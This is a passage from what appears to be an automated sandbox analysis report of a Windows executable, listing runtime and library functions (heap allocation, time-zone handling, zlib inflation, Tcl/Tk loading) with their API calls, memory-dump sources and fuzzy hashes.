                                                              • GetLastError.KERNEL32(?,?,?,00007FF623F92D22,?,?,?,00007FF623F92D5F,?,?,00000000,00007FF623F93225,?,?,?,00007FF623F93157), ref: 00007FF623F8A968
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2000514406.00007FF623F71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF623F70000, based on PE: true
                                                              • Associated: 00000000.00000002.2000482206.00007FF623F70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000679616.00007FF623F9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000743459.00007FF623FAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000743459.00007FF623FB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000831966.00007FF623FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Similarity
                                                              • API ID: ErrorLanguagesLastPreferredRestoreThread
                                                              • String ID:
                                                              • API String ID: 588628887-0
                                                              • Opcode ID: 46e6024f15a2f57ad5ff64688e0fe3cec5898f8577aba2f63b046adc8766ef53
                                                              • Instruction ID: ec49e2c184fe616dc7b4a66a3d9072cf3b2e49ec6cd9db626fab6846fe3f4cdd
                                                              • Opcode Fuzzy Hash: 46e6024f15a2f57ad5ff64688e0fe3cec5898f8577aba2f63b046adc8766ef53
                                                              • Instruction Fuzzy Hash: 3BE04F50F0D20282FE095FB27C4713812519F88B80F4540B4C80DE72A1EF2CAA468212
                                                              Function 00007FF623F8BEAC Relevance: 1.6, APIs: 1, Instructions: 112COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2000514406.00007FF623F71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF623F70000, based on PE: true
                                                              • Associated: 00000000.00000002.2000482206.00007FF623F70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000679616.00007FF623F9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000743459.00007FF623FAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000743459.00007FF623FB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000831966.00007FF623FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Similarity
                                                              • API ID: _invalid_parameter_noinfo
                                                              • String ID:
                                                              • API String ID: 3215553584-0
                                                              • Opcode ID: 5a303e376ae32d58fd1e52f1ac99a64fdc1cf63549abbe0bdd4da132c2ec767e
                                                              • Instruction ID: 68803085ac890ff1ae1599b63a91c06515a893b200519ea23def9936efbdab5c
                                                              • Opcode Fuzzy Hash: 5a303e376ae32d58fd1e52f1ac99a64fdc1cf63549abbe0bdd4da132c2ec767e
                                                              • Instruction Fuzzy Hash: 8A41B63291864587EE388B5AB94227973A0EF557C1F140171D78EE36D1CF2CEA02CB52
                                                              Function 00007FF623F77F90 Relevance: 1.6, APIs: 1, Instructions: 85COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2000514406.00007FF623F71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF623F70000, based on PE: true
                                                              • Associated: 00000000.00000002.2000482206.00007FF623F70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000679616.00007FF623F9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000743459.00007FF623FAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000743459.00007FF623FB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000831966.00007FF623FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Similarity
                                                              • API ID: _fread_nolock
                                                              • String ID:
                                                              • API String ID: 840049012-0
                                                              • Opcode ID: 571b183f16d6089f7352627b962dd36a5859a07ce2000bc688886b49100a0db2
                                                              • Instruction ID: fbe69b0e062130f4961cada25ae448c172bf8229cc7419cf9d91b2fb844d4202
                                                              • Opcode Fuzzy Hash: 571b183f16d6089f7352627b962dd36a5859a07ce2000bc688886b49100a0db2
                                                              • Instruction Fuzzy Hash: 3021D121B1879246FE549A237D077BAA641BF45BC4F8844B0EE0CAB786CF7DE241C302
                                                              Function 00007FF623F8B93C Relevance: 1.6, APIs: 1, Instructions: 79COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2000514406.00007FF623F71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF623F70000, based on PE: true
                                                              • Associated: 00000000.00000002.2000482206.00007FF623F70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000679616.00007FF623F9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000743459.00007FF623FAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000743459.00007FF623FB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000831966.00007FF623FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Similarity
                                                              • API ID: _invalid_parameter_noinfo
                                                              • String ID:
                                                              • API String ID: 3215553584-0
                                                              • Opcode ID: 0fe3e981c7cf3185d146a9a4244026f2f164e791e6f92d2a50fd94940550a020
                                                              • Instruction ID: 0200720428f4b4fd9e1d9f19a4708f9976ca0c9f1547110408a827022e38502b
                                                              • Opcode Fuzzy Hash: 0fe3e981c7cf3185d146a9a4244026f2f164e791e6f92d2a50fd94940550a020
                                                              • Instruction Fuzzy Hash: DF316122A1860285FF195B56AC4337C3A90BF84BD4F4101B5E91DA73D2CF7CEA428713
                                                              Function 00007FF623F89961 Relevance: 1.6, APIs: 1, Instructions: 61COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2000514406.00007FF623F71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF623F70000, based on PE: true
                                                              • Associated: 00000000.00000002.2000482206.00007FF623F70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000679616.00007FF623F9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000743459.00007FF623FAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000743459.00007FF623FB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000831966.00007FF623FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Similarity
                                                              • API ID: HandleModule$AddressFreeLibraryProc
                                                              • String ID:
                                                              • API String ID: 3947729631-0
                                                              • Opcode ID: 42808d7c08696a35870eb95595f0ae95ff90971c005bfc8769c42bb91e99b0de
                                                              • Instruction ID: 4a0590f39c1f1789e77ce229d17c253f88cbddfa2afcb0c12888b6c8c41b8ed0
                                                              • Opcode Fuzzy Hash: 42808d7c08696a35870eb95595f0ae95ff90971c005bfc8769c42bb91e99b0de
                                                              • Instruction Fuzzy Hash: 5A21AD72A0474589EF288F65E88A2ED33B0EB04358F041636DB6DA7AD5DF38D645C741
                                                              Function 00007FF623F85F94 Relevance: 1.6, APIs: 1, Instructions: 55COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2000514406.00007FF623F71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF623F70000, based on PE: true
                                                              • Associated: 00000000.00000002.2000482206.00007FF623F70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000679616.00007FF623F9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000743459.00007FF623FAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000743459.00007FF623FB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000831966.00007FF623FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Similarity
                                                              • API ID: _invalid_parameter_noinfo
                                                              • String ID:
                                                              • API String ID: 3215553584-0
                                                              • Opcode ID: d0ecc1d4814c8292f6d285d86e9f4332b8d7141ecd04c52723bb65a1ba9d936a
                                                              • Instruction ID: 61ac1de8077983e015140460caef87875f1144e74fe876ae013232ac7d25d2b9
                                                              • Opcode Fuzzy Hash: d0ecc1d4814c8292f6d285d86e9f4332b8d7141ecd04c52723bb65a1ba9d936a
                                                              • Instruction Fuzzy Hash: 9B116331A1C64182EE689F13BC0217DA2A5BF85BC4F4444B5EA4CF7A96CF7DD6008712
                                                              Function 00007FF623F96354 Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2000514406.00007FF623F71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF623F70000, based on PE: true
                                                              • Associated: 00000000.00000002.2000482206.00007FF623F70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000679616.00007FF623F9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000743459.00007FF623FAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000743459.00007FF623FB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000831966.00007FF623FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Similarity
                                                              • API ID: _invalid_parameter_noinfo
                                                              • String ID:
                                                              • API String ID: 3215553584-0
                                                              • Opcode ID: 3765a10cee1e255344ee37f065f4be71d58868c9c9e645b3056c9746d3493235
                                                              • Instruction ID: 0de4d686b8b05f6902c4c79f7e7950277f200226a631ffc6edfe3162d6415951
                                                              • Opcode Fuzzy Hash: 3765a10cee1e255344ee37f065f4be71d58868c9c9e645b3056c9746d3493235
                                                              • Instruction Fuzzy Hash: 6021A432A18A8186EF658F18F84277976A0FB84BA4F148234E75DD76D9DF3CD5118B01
                                                              Function 00007FF623F803BC Relevance: 1.5, APIs: 1, Instructions: 48COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2000514406.00007FF623F71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF623F70000, based on PE: true
                                                              • Associated: 00000000.00000002.2000482206.00007FF623F70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000679616.00007FF623F9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000743459.00007FF623FAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000743459.00007FF623FB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000831966.00007FF623FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Similarity
                                                              • API ID: _invalid_parameter_noinfo
                                                              • String ID:
                                                              • API String ID: 3215553584-0
                                                              • Opcode ID: 8e9754deeba93abb4745aa2efb451e77357aefa8fb0fbddb16feb6c8c90fdd62
                                                              • Instruction ID: c41b35ddc64a37062a0ca2391bd1dad25dd580e235993623bcd9bbfd3780511c
                                                              • Opcode Fuzzy Hash: 8e9754deeba93abb4745aa2efb451e77357aefa8fb0fbddb16feb6c8c90fdd62
                                                              • Instruction Fuzzy Hash: A301A521A4874681EE08DF536D02469A691BF85FE0F884671DE5CA3BD6CF3CD6018301
                                                              Function 00007FF623F8D5FC Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • RtlAllocateHeap.NTDLL(?,?,?,00007FF623F80C90,?,?,?,00007FF623F822FA,?,?,?,?,?,00007FF623F83AE9), ref: 00007FF623F8D63A
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2000514406.00007FF623F71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF623F70000, based on PE: true
                                                              • Associated: 00000000.00000002.2000482206.00007FF623F70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000679616.00007FF623F9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000743459.00007FF623FAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000743459.00007FF623FB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000831966.00007FF623FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Similarity
                                                              • API ID: AllocateHeap
                                                              • String ID:
                                                              • API String ID: 1279760036-0
                                                              • Opcode ID: 510c613edcbd96140e332c46b5608733b20d975e117422ad796dc4540c81bb80
                                                              • Instruction ID: 19bc0575146a68258317672d3fa5c98ec9f8c30d231726e673ffa54f5fe70bf2
                                                              • Opcode Fuzzy Hash: 510c613edcbd96140e332c46b5608733b20d975e117422ad796dc4540c81bb80
                                                              • Instruction Fuzzy Hash: D8F0DA52B0924B85FE596E627C4367512955F887F0F4847B2ED2EE72C1DF2CA6808512

                                                              Non-executed Functions

                                                              Function 00007FF623F776C0 Relevance: 177.1, APIs: 66, Strings: 35, Instructions: 314libraryloaderCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2000514406.00007FF623F71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF623F70000, based on PE: true
                                                              • Associated: 00000000.00000002.2000482206.00007FF623F70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000679616.00007FF623F9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000743459.00007FF623FAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000743459.00007FF623FB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000831966.00007FF623FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Similarity
                                                              • API ID: AddressErrorLastProc
                                                              • String ID: Failed to get address for %hs$GetProcAddress$Tcl_Alloc$Tcl_ConditionFinalize$Tcl_ConditionNotify$Tcl_ConditionWait$Tcl_CreateInterp$Tcl_CreateObjCommand$Tcl_CreateThread$Tcl_DeleteInterp$Tcl_DoOneEvent$Tcl_EvalEx$Tcl_EvalFile$Tcl_EvalObjv$Tcl_Finalize$Tcl_FinalizeThread$Tcl_FindExecutable$Tcl_Free$Tcl_GetCurrentThread$Tcl_GetObjResult$Tcl_GetString$Tcl_GetVar2$Tcl_Init$Tcl_JoinThread$Tcl_MutexFinalize$Tcl_MutexLock$Tcl_MutexUnlock$Tcl_NewByteArrayObj$Tcl_NewStringObj$Tcl_SetVar2$Tcl_SetVar2Ex$Tcl_ThreadAlert$Tcl_ThreadQueueEvent$Tk_GetNumMainWindows$Tk_Init
                                                              • API String ID: 199729137-3427451314
                                                              • Opcode ID: 939c8a0ebf27c7f5789cd4a10996167767bc86255d761b2ba34a42bc6fc861e3
                                                              • Instruction ID: 97291d20f2de1d9dc0071117a78119b51c0e09e7b50eb4106f23570afe94c046
                                                              • Opcode Fuzzy Hash: 939c8a0ebf27c7f5789cd4a10996167767bc86255d761b2ba34a42bc6fc861e3
                                                              • Instruction Fuzzy Hash: 4E02C361A1DB0BD0FE149F19BD125B423A1AF48B45F6180B2D42EAB274EF3CB759C203
                                                              Function 00007FF623F940AC Relevance: 24.0, APIs: 9, Strings: 4, Instructions: 1226COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2000514406.00007FF623F71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF623F70000, based on PE: true
                                                              • Associated: 00000000.00000002.2000482206.00007FF623F70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000679616.00007FF623F9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000743459.00007FF623FAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000743459.00007FF623FB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000831966.00007FF623FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Similarity
                                                              • API ID: _invalid_parameter_noinfo$memcpy_s$fegetenv
                                                              • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                              • API String ID: 808467561-2761157908
                                                              • Opcode ID: 7da0388417e7c773b0aab48e07e342724827a26e5879d16e5decf6c79e081c8c
                                                              • Instruction ID: b323c76abb8dfdcba2c1def5fb284c63c0a40c0c819c03997f1562c07af1b35c
                                                              • Opcode Fuzzy Hash: 7da0388417e7c773b0aab48e07e342724827a26e5879d16e5decf6c79e081c8c
                                                              • Instruction Fuzzy Hash: A0B2C772F182828BEB65CF64E9417FD77A1FB54388F509175DA0DA7A84DF38AA00CB41
                                                              Function 00007FF623F7ACAD Relevance: 12.0, Strings: 9, Instructions: 744COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2000514406.00007FF623F71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF623F70000, based on PE: true
                                                              • Associated: 00000000.00000002.2000482206.00007FF623F70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000679616.00007FF623F9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000743459.00007FF623FAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000743459.00007FF623FB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000831966.00007FF623FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Similarity
                                                              • API ID:
                                                              • String ID: invalid bit length repeat$invalid code -- missing end-of-block$invalid code lengths set$invalid distance code$invalid distance too far back$invalid distances set$invalid literal/length code$invalid literal/lengths set$too many length or distance symbols
                                                              • API String ID: 0-2665694366
                                                              • Opcode ID: 14409f6b5173d9f28888b9fb9c68bcc2b54b8e7def706e6c40ef53002486e1ba
                                                              • Instruction ID: dc59292e1dc380a22bfaf30aaacddc2d229134def82524ebea8025f9a4358955
                                                              • Opcode Fuzzy Hash: 14409f6b5173d9f28888b9fb9c68bcc2b54b8e7def706e6c40ef53002486e1ba
                                                              • Instruction Fuzzy Hash: 95522672A146A64BDFA48F14E859B7E3BA9FB45340F014178E64ADB780DF3CDA44CB41
                                                              Function 00007FF623F7D12C Relevance: 10.6, APIs: 7, Instructions: 71COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2000514406.00007FF623F71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF623F70000, based on PE: true
                                                              • Associated: 00000000.00000002.2000482206.00007FF623F70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000679616.00007FF623F9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000743459.00007FF623FAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000743459.00007FF623FB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000831966.00007FF623FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Similarity
                                                              • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                              • String ID:
                                                              • API String ID: 3140674995-0
                                                              • Opcode ID: 357b26123f7cc0566be18cabbec560c6351d8abd4e8582c9dfa9d4018571b442
                                                              • Instruction ID: 2f6d75af6617948ab989aabb87f3835874cf3c10ef7a8bcb6410c32cd4f5b9b5
                                                              • Opcode Fuzzy Hash: 357b26123f7cc0566be18cabbec560c6351d8abd4e8582c9dfa9d4018571b442
                                                              • Instruction Fuzzy Hash: 1F312C72608B8586EF608F60F8817EE7365FB84748F44407ADA4E9BB98DF78D648C711
                                                              Function 00007FF623F95C00 Relevance: 9.3, APIs: 6, Instructions: 334timeCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • _get_daylight.LIBCMT ref: 00007FF623F95C45
                                                                • Part of subcall function 00007FF623F95598: _invalid_parameter_noinfo.LIBCMT ref: 00007FF623F955AC
                                                                • Part of subcall function 00007FF623F8A948: RtlRestoreThreadPreferredUILanguages.NTDLL(?,?,?,00007FF623F92D22,?,?,?,00007FF623F92D5F,?,?,00000000,00007FF623F93225,?,?,?,00007FF623F93157), ref: 00007FF623F8A95E
                                                                • Part of subcall function 00007FF623F8A948: GetLastError.KERNEL32(?,?,?,00007FF623F92D22,?,?,?,00007FF623F92D5F,?,?,00000000,00007FF623F93225,?,?,?,00007FF623F93157), ref: 00007FF623F8A968
                                                                • Part of subcall function 00007FF623F8A900: IsProcessorFeaturePresent.KERNEL32(?,?,?,?,00007FF623F8A8DF,?,?,?,?,?,00007FF623F8A7CA), ref: 00007FF623F8A909
                                                                • Part of subcall function 00007FF623F8A900: GetCurrentProcess.KERNEL32(?,?,?,?,00007FF623F8A8DF,?,?,?,?,?,00007FF623F8A7CA), ref: 00007FF623F8A92E
                                                              • _get_daylight.LIBCMT ref: 00007FF623F95C34
                                                                • Part of subcall function 00007FF623F955F8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF623F9560C
                                                              • _get_daylight.LIBCMT ref: 00007FF623F95EAA
                                                              • _get_daylight.LIBCMT ref: 00007FF623F95EBB
                                                              • _get_daylight.LIBCMT ref: 00007FF623F95ECC
                                                              • GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,00007FF623F9610C), ref: 00007FF623F95EF3
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2000514406.00007FF623F71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF623F70000, based on PE: true
                                                              • Associated: 00000000.00000002.2000482206.00007FF623F70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000679616.00007FF623F9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000743459.00007FF623FAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000743459.00007FF623FB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000831966.00007FF623FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Similarity
                                                              • API ID: _get_daylight$_invalid_parameter_noinfo$CurrentErrorFeatureInformationLanguagesLastPreferredPresentProcessProcessorRestoreThreadTimeZone
                                                              • String ID:
                                                              • API String ID: 1458651798-0
                                                              • Opcode ID: c8e181fbda5929fcc8f6a75e148055e791a7ddaa32984997676ab034941af52a
                                                              • Instruction ID: 74309f112498c5ff5783d953913a435f8da0cccafa8c50719d8e3bbafe937668
                                                              • Opcode Fuzzy Hash: c8e181fbda5929fcc8f6a75e148055e791a7ddaa32984997676ab034941af52a
                                                              • Instruction Fuzzy Hash: 63D1E322E0824286EF24EF26FC421B96351EF84798F44C076EA4DE7696DF3CE641C742
                                                              Function 00007FF623F8A614 Relevance: 9.1, APIs: 6, Instructions: 83COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2000514406.00007FF623F71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF623F70000, based on PE: true
                                                              • Associated: 00000000.00000002.2000482206.00007FF623F70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000679616.00007FF623F9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000743459.00007FF623FAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000743459.00007FF623FB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000831966.00007FF623FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Similarity
                                                              • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                              • String ID:
                                                              • API String ID: 1239891234-0
                                                              • Opcode ID: ae2d74aaff6e8c1310ec24f87c3395aa5518f909cdba62f6f822c67f0a9cc142
                                                              • Instruction ID: f891d0c350830a8d30cc694df7f49331d3098fcacfe173fcb2cbcaa5400768f5
                                                              • Opcode Fuzzy Hash: ae2d74aaff6e8c1310ec24f87c3395aa5518f909cdba62f6f822c67f0a9cc142
                                                              • Instruction Fuzzy Hash: B2315E36608B8186EF608F25FC412AE73A4FB88794F544136EA9D97B98DF3CD645CB01
                                                              Function 00007FF623F91874 Relevance: 7.8, APIs: 5, Instructions: 282COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2000514406.00007FF623F71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF623F70000, based on PE: true
                                                              • Associated: 00000000.00000002.2000482206.00007FF623F70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000679616.00007FF623F9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000743459.00007FF623FAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000743459.00007FF623FB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000831966.00007FF623FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Similarity
                                                              • API ID: FileFindFirst_invalid_parameter_noinfo
                                                              • String ID:
                                                              • API String ID: 2227656907-0
                                                              • Opcode ID: ee5daded1920a45b930385d49f4c9fb7106de6f00b6358014c2482279c1420ad
                                                              • Instruction ID: 87578543d64eeeedb5ecd9026ab2b65460e0b2c71fa6995c7aa6845f8956026e
                                                              • Opcode Fuzzy Hash: ee5daded1920a45b930385d49f4c9fb7106de6f00b6358014c2482279c1420ad
                                                              • Instruction Fuzzy Hash: E1B1D822B1869241EF619F22BD021B96391EB44BE4F449171DE5EA7BD5DF3CEA42C302
                                                              Function 00007FF623F95E7C Relevance: 6.1, APIs: 4, Instructions: 143timeCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • _get_daylight.LIBCMT ref: 00007FF623F95EAA
                                                                • Part of subcall function 00007FF623F955F8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF623F9560C
                                                              • _get_daylight.LIBCMT ref: 00007FF623F95EBB
                                                                • Part of subcall function 00007FF623F95598: _invalid_parameter_noinfo.LIBCMT ref: 00007FF623F955AC
                                                              • _get_daylight.LIBCMT ref: 00007FF623F95ECC
                                                                • Part of subcall function 00007FF623F955C8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF623F955DC
                                                                • Part of subcall function 00007FF623F8A948: RtlRestoreThreadPreferredUILanguages.NTDLL(?,?,?,00007FF623F92D22,?,?,?,00007FF623F92D5F,?,?,00000000,00007FF623F93225,?,?,?,00007FF623F93157), ref: 00007FF623F8A95E
                                                                • Part of subcall function 00007FF623F8A948: GetLastError.KERNEL32(?,?,?,00007FF623F92D22,?,?,?,00007FF623F92D5F,?,?,00000000,00007FF623F93225,?,?,?,00007FF623F93157), ref: 00007FF623F8A968
                                                              • GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,00007FF623F9610C), ref: 00007FF623F95EF3
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2000514406.00007FF623F71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF623F70000, based on PE: true
                                                              • Associated: 00000000.00000002.2000482206.00007FF623F70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000679616.00007FF623F9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000743459.00007FF623FAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000743459.00007FF623FB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000831966.00007FF623FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Similarity
                                                              • API ID: _get_daylight_invalid_parameter_noinfo$ErrorInformationLanguagesLastPreferredRestoreThreadTimeZone
                                                              • String ID:
                                                              • API String ID: 2248164782-0
                                                              • Opcode ID: 6f2171165b001c2744b9d494c76d2a7753c36df5ed5d67f3075860c83c0dbe14
                                                              • Instruction ID: 2b82bd0ee96161ef44928f6b36998cfc2ca58fd522b00c19d32ac01e9802deef
                                                              • Opcode Fuzzy Hash: 6f2171165b001c2744b9d494c76d2a7753c36df5ed5d67f3075860c83c0dbe14
                                                              • Instruction Fuzzy Hash: 2451C672A0864286EF10DF21FC835A96761FB88794F4481B6EA4DE76A6DF3CE6018741
                                                              Function 00007FF623F7D010 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
